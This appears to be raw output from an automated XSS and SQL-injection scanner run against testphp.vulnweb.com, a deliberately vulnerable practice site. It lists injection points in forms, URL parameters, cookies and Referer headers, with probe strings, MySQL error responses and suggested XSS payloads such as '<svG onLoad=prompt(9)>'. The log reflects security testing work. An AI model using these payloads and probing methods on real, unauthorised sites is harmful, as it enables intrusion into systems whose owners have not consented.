
[i] URL: http://testphp.vulnweb.com/
[i] Response URL: http://testphp.vulnweb.com/search.php?test=query
[i] POST URL: http://testphp.vulnweb.com/search.php?test=query
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjuz'"(){}<x>:/1zqjuz;9
[+] Type: form
[+] Injectiepunten: searchFor
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <h2 id='pagename'>searched for: 1zqjuz'"(){}<x>:/1zqjuz;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjql'"(){}<x>:/1zqjql;9
[+] Type: form
[+] Injectiepunten: text
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjql'"(){}<x>:/1zqjql;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjql'"(){}<x>:/1zqjql;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjql'"(){}<x>:/1zqjql;9

[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/userinfo.php
[i] POST URL: http://testphp.vulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvp'"(){}<x>:/1zqjvp;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjxw'%22()%7B%7D%3Cx%3E:/1zqjxw;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjxw'"(){}<x>:/1zqjxw;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjjy'%22()%7B%7D%3Cx%3E:/1zqjjy;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjjy'"(){}<x>:/1zqjjy;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjgn'%22()%7B%7D%3Cx%3E:/1zqjgn;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjgn'"(){}<x>:/1zqjgn;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) ", x"><svG onLoad=prompt(9)>
[i] Line: <a href="params.php?p=valid&pp=1zqjgn'"(){}<x>:/1zqjgn;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjck'%22()%7B%7D%3Cx%3E:/1zqjck;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjck'"(){}<x>:/1zqjck;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjck'%22()%7B%7D%3Cx%3E:/1zqjck;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjck'"(){}<x>:/1zqjck;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjck;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjez'%22()%7B%7D%3Cx%3E:/1zqjez;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjez'"(){}<x>:/1zqjez;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjez'%22()%7B%7D%3Cx%3E:/1zqjez;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjez'"(){}<x>:/1zqjez;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjez;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjir'%22()%7B%7D%3Cx%3E:/1zqjir;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjir'"(){}<x>:/1zqjir;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjrn'%22()%7B%7D%3Cx%3E:/1zqjrn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjrn'"(){}<x>:/1zqjrn;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjid'%22()%7B%7D%3Cx%3E:/1zqjid;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjid'"(){}<x>:/1zqjid;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjid'%22()%7B%7D%3Cx%3E:/1zqjid;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjid'"(){}<x>:/1zqjid;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjid;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvs'%22()%7B%7D%3Cx%3E:/1zqjvs;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvs'"(){}<x>:/1zqjvs;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjeh'%22()%7B%7D%3Cx%3E:/1zqjeh;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjeh'"(){}<x>:/1zqjeh;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjjn'%22()%7B%7D%3Cx%3E:/1zqjjn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjjn'"(){}<x>:/1zqjjn;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjuk'%22()%7B%7D%3Cx%3E:/1zqjuk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjuk'"(){}<x>:/1zqjuk;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjhr'%22()%7B%7D%3Cx%3E:/1zqjhr;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjhr'"(){}<x>:/1zqjhr;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjhr'"(){}<x>:/1zqjhr;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjws'%22()%7B%7D%3Cx%3E:/1zqjws;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjws'"(){}<x>:/1zqjws;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjws'"(){}<x>:/1zqjws;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjcz'%22()%7B%7D%3Cx%3E:/1zqjcz;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjcz'"(){}<x>:/1zqjcz;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjtx'%22()%7B%7D%3Cx%3E:/1zqjtx;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjtx'"(){}<x>:/1zqjtx;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjtx'"(){}<x>:/1zqjtx;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjcx'%22()%7B%7D%3Cx%3E:/1zqjcx;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjcx'"(){}<x>:/1zqjcx;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjcx'"(){}<x>:/1zqjcx;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjhm'%22()%7B%7D%3Cx%3E:/1zqjhm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjhm'"(){}<x>:/1zqjhm;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjcs'%22()%7B%7D%3Cx%3E:/1zqjcs;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjcs'"(){}<x>:/1zqjcs;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjcs'"(){}<x>:/1zqjcs;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjmw'%22()%7B%7D%3Cx%3E:/1zqjmw;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmw'"(){}<x>:/1zqjmw;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjmw'"(){}<x>:/1zqjmw;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjbh'%22()%7B%7D%3Cx%3E:/1zqjbh;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbh'"(){}<x>:/1zqjbh;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjbh'"(){}<x>:/1zqjbh;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjha'%22()%7B%7D%3Cx%3E:/1zqjha;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjha'"(){}<x>:/1zqjha;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjha'%22()%7B%7D%3Cx%3E:/1zqjha;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjha'"(){}<x>:/1zqjha;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjha;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvg'%22()%7B%7D%3Cx%3E:/1zqjvg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvg'"(){}<x>:/1zqjvg;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvg'%22()%7B%7D%3Cx%3E:/1zqjvg;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjvg'"(){}<x>:/1zqjvg;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjvg;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/
[i] Response URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjht'"(){}<x>:/1zqjht;9
[+] Type: header
[+] Injectiepunten: cookie
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html
[i] Response URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwm'"(){}<x>:/1zqjwm;9
[+] Type: header
[+] Injectiepunten: Referer
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html
[i] Response URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjgl'"(){}<x>:/1zqjgl;9
[+] Type: header
[+] Injectiepunten: cookie
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/
[i] Response URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/1zqjzk'%22()%7B%7D%3Cx%3E:1zqjzk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzk'"(){}<x>:1zqjzk;9
[+] Type: url
[+] Injectiepunten: end of url
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/
[i] Response URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsi'"(){}<x>:/1zqjsi;9
[+] Type: header
[+] Injectiepunten: Referer
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjiu'"(){}<x>:/1zqjiu;9
[+] Type: header
[+] Injectiepunten: cookie
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjkm'%22()%7B%7D%3Cx%3E:/1zqjkm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjkm'"(){}<x>:/1zqjkm;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjxl'"(){}<x>:/1zqjxl;9
[+] Type: header
[+] Injectiepunten: Referer
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjdm'%22()%7B%7D%3Cx%3E:/1zqjdm;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjdm'"(){}<x>:/1zqjdm;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjdm'"(){}<x>:/1zqjdm;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjbz'%22()%7B%7D%3Cx%3E:/1zqjbz;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbz'"(){}<x>:/1zqjbz;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjbz'"(){}<x>:/1zqjbz;9
